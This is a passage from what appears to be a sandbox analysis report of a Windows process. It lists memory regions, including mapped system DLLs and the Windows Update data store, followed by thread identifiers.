end_va = 0x7fffff7dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 2297
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 2298
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 2299
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 2300
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 2301
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 2302
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 2303
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 2304
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 2305
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 2306
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 2307
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 2308
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 2309
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 2310
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 2311
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 2312
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 2313
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 2314
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 2315
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 2316
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 2317
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 2318
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 2319
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 2320
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2321
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2322
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2323
start_va = 0x7fffffd8000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2324
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2325
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2326
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2347
start_va = 0x7fefd150000
end_va = 0x7fefd157fff
entry_point = 0x7fefd150000
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 2348
start_va = 0x7fef65e0000
end_va = 0x7fef65ecfff
entry_point = 0x7fef65e0000
region_type = mapped_file
name = "wups.dll"
filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")
Region:
id = 2349
start_va = 0xcf0000
end_va = 0xd09fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 2350
start_va = 0xd10000
end_va = 0xd10fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d10000"
filename = ""
Region:
id = 2351
start_va = 0xd20000
end_va = 0xd20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d20000"
filename = ""
Region:
id = 2352
start_va = 0xd30000
end_va = 0xd37fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d30000"
filename = ""
Region:
id = 2353
start_va = 0xd40000
end_va = 0xd4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d40000"
filename = ""
Region:
id = 2354
start_va = 0xd50000
end_va = 0xd5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d50000"
filename = ""
Region:
id = 2355
start_va = 0xd60000
end_va = 0xd6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d60000"
filename = ""
Region:
id = 2356
start_va = 0xda0000
end_va = 0xda0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000da0000"
filename = ""
Region:
id = 2357
start_va = 0x1250000
end_va = 0x1251fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001250000"
filename = ""
Region:
id = 2358
start_va = 0x12e0000
end_va = 0x12effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012e0000"
filename = ""
Region:
id = 2359
start_va = 0x12f0000
end_va = 0x12fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012f0000"
filename = ""
Region:
id = 2360
start_va = 0x1300000
end_va = 0x130ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001300000"
filename = ""
Region:
id = 2361
start_va = 0x1310000
end_va = 0x131ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001310000"
filename = ""
Region:
id = 2362
start_va = 0x1320000
end_va = 0x132ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001320000"
filename = ""
Region:
id = 2363
start_va = 0x1330000
end_va = 0x133ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001330000"
filename = ""
Region:
id = 2364
start_va = 0x1340000
end_va = 0x1340fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001340000"
filename = ""
Region:
id = 2365
start_va = 0x1350000
end_va = 0x135ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001350000"
filename = ""
Region:
id = 2366
start_va = 0x1460000
end_va = 0x1467fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 2367
start_va = 0x1470000
end_va = 0x147ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 2368
start_va = 0x1480000
end_va = 0x148ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 2369
start_va = 0x1590000
end_va = 0x1597fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001590000"
filename = ""
Region:
id = 2370
start_va = 0x15a0000
end_va = 0x15affff
entry_point = 0x15a0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2371
start_va = 0x15b0000
end_va = 0x15bffff
entry_point = 0x15b0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 2372
start_va = 0x15d0000
end_va = 0x15dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015d0000"
filename = ""
Region:
id = 2373
start_va = 0x15e0000
end_va = 0x15effff
entry_point = 0x0
region_type = private
name = "private_0x00000000015e0000"
filename = ""
Region:
id = 2374
start_va = 0x15f0000
end_va = 0x15fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015f0000"
filename = ""
Region:
id = 2375
start_va = 0x1680000
end_va = 0x1687fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001680000"
filename = ""
Region:
id = 2376
start_va = 0x1690000
end_va = 0x169ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001690000"
filename = ""
Region:
id = 2377
start_va = 0x1970000
end_va = 0x19effff
entry_point = 0x0
region_type = private
name = "private_0x0000000001970000"
filename = ""
Region:
id = 2378
start_va = 0x1b10000
end_va = 0x1b1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b10000"
filename = ""
Region:
id = 2379
start_va = 0x1b20000
end_va = 0x1b2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b20000"
filename = ""
Region:
id = 2380
start_va = 0x1b30000
end_va = 0x1b3ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b30000"
filename = ""
Region:
id = 2381
start_va = 0x1b40000
end_va = 0x1b4ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b40000"
filename = ""
Region:
id = 2382
start_va = 0x1b50000
end_va = 0x1b5ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b50000"
filename = ""
Region:
id = 2383
start_va = 0x1b60000
end_va = 0x1b6ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b60000"
filename = ""
Region:
id = 2384
start_va = 0x1d10000
end_va = 0x1d4ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d10000"
filename = ""
Region:
id = 2385
start_va = 0x1d50000
end_va = 0x1d8ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d50000"
filename = ""
Region:
id = 2386
start_va = 0x2910000
end_va = 0x29cffff
entry_point = 0x2910000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2387
start_va = 0x31c0000
end_va = 0x32bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031c0000"
filename = ""
Region:
id = 2388
start_va = 0x3530000
end_va = 0x362ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003530000"
filename = ""
Region:
id = 2389
start_va = 0x3630000
end_va = 0x36affff
entry_point = 0x0
region_type = private
name = "private_0x0000000003630000"
filename = ""
Region:
id = 2390
start_va = 0x3950000
end_va = 0x3a4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003950000"
filename = ""
Region:
id = 2391
start_va = 0x3d10000
end_va = 0x3d8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003d10000"
filename = ""
Region:
id = 2392
start_va = 0x3ee0000
end_va = 0x3fdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ee0000"
filename = ""
Region:
id = 2393
start_va = 0x3fe0000
end_va = 0x40dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003fe0000"
filename = ""
Region:
id = 2394
start_va = 0x4840000
end_va = 0x493ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004840000"
filename = ""
Region:
id = 2395
start_va = 0x49d0000
end_va = 0x59cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000049d0000"
filename = ""
Region:
id = 2396
start_va = 0x7fef1b50000
end_va = 0x7fef1d23fff
entry_point = 0x7fef1b50000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 2397
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 2398
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2399
start_va = 0x1720000
end_va = 0x1720fff
entry_point = 0x1720000
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 2400
start_va = 0x17c0000
end_va = 0x17dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017c0000"
filename = ""
Region:
id = 2401
start_va = 0x25e0000
end_va = 0x265ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000025e0000"
filename = ""
Region:
id = 2402
start_va = 0x5aa0000
end_va = 0x5b1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005aa0000"
filename = ""
Region:
id = 2403
start_va = 0x5c90000
end_va = 0x5d0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005c90000"
filename = ""
Region:
id = 2404
start_va = 0x5d10000
end_va = 0x610ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005d10000"
filename = ""
Region:
id = 2405
start_va = 0x7fef5c60000
end_va = 0x7fef5cdbfff
entry_point = 0x7fef5c611d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Thread:
id = 113
os_tid = 0x8e4
Thread:
id = 114
os_tid = 0x8d4
Thread:
id = 115
os_tid = 0x8c4
Thread:
id = 116
os_tid = 0x8b4
Thread:
id = 117
os_tid = 0x8a4
Thread:
id = 118
os_tid = 0x894
Thread:
id = 119
os_tid = 0x884
Thread:
id = 120
os_tid = 0x874
Thread:
id = 121
os_tid = 0x848
Thread:
id = 122
os_tid = 0x828
Thread:
id = 123
os_tid = 0x898
Thread:
id = 124
os_tid = 0x888
Thread:
id = 125
os_tid = 0xb98
Thread:
id = 126
os_tid = 0xb94
Thread:
id = 127
os_tid = 0xb8c
Thread:
id = 128
os_tid = 0xb80
Thread:
id = 129
os_tid = 0x950
Thread:
id = 130
os_tid = 0x4dc
Thread:
id = 131
os_tid = 0x454
Thread:
id = 132
os_tid = 0x53c
Thread:
id = 133
os_tid = 0x490
Thread:
id = 134
os_tid = 0x4ac
Thread:
id = 135
os_tid = 0x748
Thread:
id = 136
os_tid = 0x720
Thread:
id = 137
os_tid = 0x6d8
Thread:
id = 138
os_tid = 0x6d4
Thread:
id = 139
os_tid = 0x6cc
Thread:
id = 140
os_tid = 0x6b8
Thread:
id = 141
os_tid = 0x670
Thread:
id = 142
os_tid = 0x130
Thread:
id = 143
os_tid = 0x30c
Thread:
id = 144
os_tid = 0x2b4
Thread:
id = 145
os_tid = 0x294
Thread:
id = 146
os_tid = 0x26c
Thread:
id = 147
os_tid = 0x21c
Thread:
id = 148
os_tid = 0x234
Thread:
id = 149
os_tid = 0x3e4
Thread:
id = 150
os_tid = 0x3d8
Thread:
id = 151
os_tid = 0x3cc
Thread:
id = 152
os_tid = 0x37c
Thread:
id = 153
os_tid = 0x36c
Thread:
id = 154
os_tid = 0x368
Thread:
id = 155
os_tid = 0x360
Thread:
id = 156
os_tid = 0x358
Thread:
id = 157
os_tid = 0x350
Thread:
id = 160
os_tid = 0x1e8
Thread:
id = 161
os_tid = 0x8e8
Thread:
id = 163
os_tid = 0x380
Thread:
id = 164
os_tid = 0x9fc
Thread:
id = 165
os_tid = 0xb84
Thread:
id = 166
os_tid = 0x984
Thread:
id = 167
os_tid = 0xb88
Thread:
id = 168
os_tid = 0x654
Thread:
id = 169
os_tid = 0x754